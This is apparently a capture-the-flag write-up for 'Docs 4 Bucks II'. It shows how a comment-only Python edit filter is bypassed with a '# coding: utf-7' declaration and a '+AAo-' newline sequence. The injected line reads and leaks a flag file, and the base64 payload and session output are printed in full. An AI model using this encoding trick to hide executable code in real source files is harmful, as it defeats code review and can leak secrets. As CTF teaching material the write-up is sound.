misc

1, I got Meta after the competition tho

Docs 4 Bucks II

You know the gist from our old challenge.

You document our code, we give you $$$!!!!

nc 0.cloud.chals.io 18965

tldr;

Result: one “comment” line becomes executable Python without violating the filter.

solve

We are given a Python module flag_checker.py and told we may only “document” it: add lines that start with # containing ASCII printable characters; any edit or non-comment line is rejected. The service then executes the file with pytest. We bypass the restriction by adding an encoding declaration (# coding: utf-7) and, on the next comment line, embedding the UTF–7 sequence +AAo- (newline).

After decoding, that sequence turns the remainder of the line into a real code line which we use to raise an exception that prints the flag from resources/flag.txt.

run

❯ nc 0.cloud.chals.io 18965

 _______                                       __    __        _______                       __
|       \                                     |  \  |  \      |       \                     |  \
| $$$$$$$\  ______    _______   _______       | $$  | $$      | $$$$$$$\ __    __   _______ | $$   __   _______
| $$  | $$ /      \  /       \ /       \      | $$__| $$      | $$__/ $$|  \  |  \ /       \| $$  /  \ /       \\
| $$  | $$|  $$$$$$\|  $$$$$$$|  $$$$$$$      | $$    $$      | $$    $$| $$  | $$|  $$$$$$$| $$_/  $$|  $$$$$$$\
| $$  | $$| $$  | $$| $$       \$$    \        \$$$$$$$$      | $$$$$$$\| $$  | $$| $$      | $$   $$  \$$    \
| $$__/ $$| $$__/ $$| $$_____  _\$$$$$$\            | $$      | $$__/ $$| $$__/ $$| $$_____ | $$$$$$\  _\$$$$$$\\
| $$    $$ \$$    $$ \$$     \|       $$            | $$      | $$    $$ \$$    $$ \$$     \| $$  \$$\|       $$
 \$$$$$$$   \$$$$$$   \$$$$$$$ \$$$$$$$              \$$       \$$$$$$$   \$$$$$$   \$$$$$$$ \$$   \$$ \$$$$$$$

Welcome to Docs 4 Bucks -- You document our code, we give you $$$!!!!

RULES:
  1. Don't delete or change any existing line of code!
  2. You may only add documentation (lines starting with '#' containing ascii printable characters).
  3. Hacking is futile, we have world-class protection in place.

Your job is to document our flag_checker.py (base64):

aW1wb3J0IG9zCgpjbGFzcyBGbGFnQ2hlY2tlcjoKICAgIGRlZiBfX2luaXRfXyhzZWxmLCBwYXRoX3RvX2ZsYWc6IHN0cik6CiAgICAgICAgc2VsZi5wYXRoX3RvX2ZsYWcgPSBwYXRoX3RvX2ZsYWcKCiAgICBkZWYgY2hlY2soc2VsZikgLT4gYm9vbDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHdpdGggb3BlbihzZWxmLnBhdGhfdG9fZmxhZywgJ3InKSBhcyBmOgogICAgICAgICAgICAgICAgZmxhZyA9IGYucmVhZCgpCiAgICAgICAgZXhjZXB0IChGaWxlTm90Rm91bmRFcnJvciwgSU9FcnJvcik6CiAgICAgICAgICAgIHJldHVybiBGYWxzZQogICAgICAgIHJldHVybiBmbGFnLnN0YXJ0c3dpdGgoIkZvcnRJRHsiKSBhbmQgZmxhZy5lbmRzd2l0aCgifVxuIikKCgpkZWYgdGVzdF9mbGFnKCk6CiAgICBmbGFnX3BhdGggPSBvcy5wYXRoLmpvaW4ob3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKSwgJ3Jlc291cmNlcycsICdmbGFnLnR4dCcpCiAgICBjaGVja2VyID0gRmxhZ0NoZWNrZXIoZmxhZ19wYXRoKQogICAgYXNzZXJ0IGNoZWNrZXIuY2hlY2soKQoKCmRlZiB0ZXN0X2ludmFsaWQodG1wX3BhdGgpOgogICAgYmFkX2ZsYWcgPSB0bXBfcGF0aCAvICJiYWRfZmxhZy50eHQiCiAgICBiYWRfZmxhZy53cml0ZV90ZXh0KCJOT1RfQV9GTEFHXG4iKQogICAgY2hlY2tlciA9IEZsYWdDaGVja2VyKHN0cihiYWRfZmxhZykpCiAgICBhc3NlcnQgbm90IGNoZWNrZXIuY2hlY2soKQoKCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CiAgICBpbXBvcnQgcHl0ZXN0CiAgICBpbXBvcnQgc3lzCiAgICBzeXMuZXhpdChweXRlc3QubWFpbihbX19maWxlX19dKSkK

Submit documented version of the code (base64):

IyBjb2Rpbmc6IHV0Zi03CiMgK0FBby1yYWlzZSBBc3NlcnRpb25FcnJvcihfX2ltcG9ydF9fKCdwYXRobGliJykuUGF0aChfX2ZpbGVfXykud2l0aF9uYW1lKCdyZXNvdXJjZXMnKS5qb2lucGF0aCgnZmxhZy50eHQnKS5yZWFkX3RleHQoKSkKaW1wb3J0IG9zCgpjbGFzcyBGbGFnQ2hlY2tlcjoKICAgIGRlZiBfX2luaXRfXyhzZWxmLCBwYXRoX3RvX2ZsYWc6IHN0cik6CiAgICAgICAgc2VsZi5wYXRoX3RvX2ZsYWcgPSBwYXRoX3RvX2ZsYWcKCiAgICBkZWYgY2hlY2soc2VsZikgLT4gYm9vbDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHdpdGggb3BlbihzZWxmLnBhdGhfdG9fZmxhZywgJ3InKSBhcyBmOgogICAgICAgICAgICAgICAgZmxhZyA9IGYucmVhZCgpCiAgICAgICAgZXhjZXB0IChGaWxlTm90Rm91bmRFcnJvciwgSU9FcnJvcik6CiAgICAgICAgICAgIHJldHVybiBGYWxzZQogICAgICAgIHJldHVybiBmbGFnLnN0YXJ0c3dpdGgoIkZvcnRJRHsiKSBhbmQgZmxhZy5lbmRzd2l0aCgifVxuIikKCgpkZWYgdGVzdF9mbGFnKCk6CiAgICBmbGFnX3BhdGggPSBvcy5wYXRoLmpvaW4ob3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKSwgJ3Jlc291cmNlcycsICdmbGFnLnR4dCcpCiAgICBjaGVja2VyID0gRmxhZ0NoZWNrZXIoZmxhZ19wYXRoKQogICAgYXNzZXJ0IGNoZWNrZXIuY2hlY2soKQoKCmRlZiB0ZXN0X2ludmFsaWQodG1wX3BhdGgpOgogICAgYmFkX2ZsYWcgPSB0bXBfcGF0aCAvICJiYWRfZmxhZy50eHQiCiAgICBiYWRfZmxhZy53cml0ZV90ZXh0KCJOT1RfQV9GTEFHXG4iKQogICAgY2hlY2tlciA9IEZsYWdDaGVja2VyKHN0cihiYWRfZmxhZykpCiAgICBhc3NlcnQgbm90IGNoZWNrZXIuY2hlY2soKQoKCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CiAgICBpbXBvcnQgcHl0ZXN0CiAgICBpbXBvcnQgc3lzCiAgICBzeXMuZXhpdChweXRlc3QubWFpbihbX19maWxlX19dKSkK
Thank you for your contribution, we'll run the test suite just to be safe...


==================================== ERRORS ====================================
_______________________ ERROR collecting flag_checker.py _______________________
flag_checker.py:3: in <module>
    raise AssertionError(__import__('pathlib').Path(__file__).with_name('resources').joinpath('flag.txt').read_text())
E   AssertionError: FortID{Y0u_Add3d_S0m3_C0mm3n75_4nD_G07_Th3_Fl4g_:0}
=========================== short test summary info ============================
ERROR flag_checker.py - AssertionError: FortID{Y0u_Add3d_S0m3_C0mm3n75_4nD_G0...
!!!!!!!!!!!!!!!!!!!! Interrupted: 1 error during collection !!!!!!!!!!!!!!!!!!!!
1 error in 0.13s

solve

• FortID{Y0u_Add3d_S0m3_C0mm3n75_4nD_G07_Th3_Fl4g_:0}